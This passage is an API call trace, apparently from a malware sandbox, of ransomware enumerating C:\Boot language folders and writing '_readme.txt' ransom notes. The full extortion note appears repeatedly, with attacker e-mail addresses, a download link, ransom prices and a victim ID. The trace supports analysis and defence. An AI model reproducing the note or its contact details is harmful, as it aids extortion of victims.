1 [0201.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.616] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0201.616] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.616] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.616] PathFindFileNameW (pszPath="") returned="" [0201.616] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.617] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.617] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.617] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.617] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0201.617] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 0 [0201.617] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.617] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.618] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\_readme.txt" (normalized: "c:\\boot\\nl-nl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0201.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.618] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.618] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.618] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0201.618] PathFindExtensionW (pszPath="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned=".mui" [0201.618] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced80 | out: hHeap=0x2c0000) returned 1 [0201.618] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0201.618] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0201.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0201.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.619] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0201.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0201.619] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0201.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0201.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0201.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.623] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0201.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.623] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.623] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.623] PathFindFileNameW (pszPath="") returned="" [0201.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.623] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.624] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0201.624] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b68060 [0201.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.624] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.624] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0201.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0201.625] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 0 [0201.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b68060 [0201.625] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") 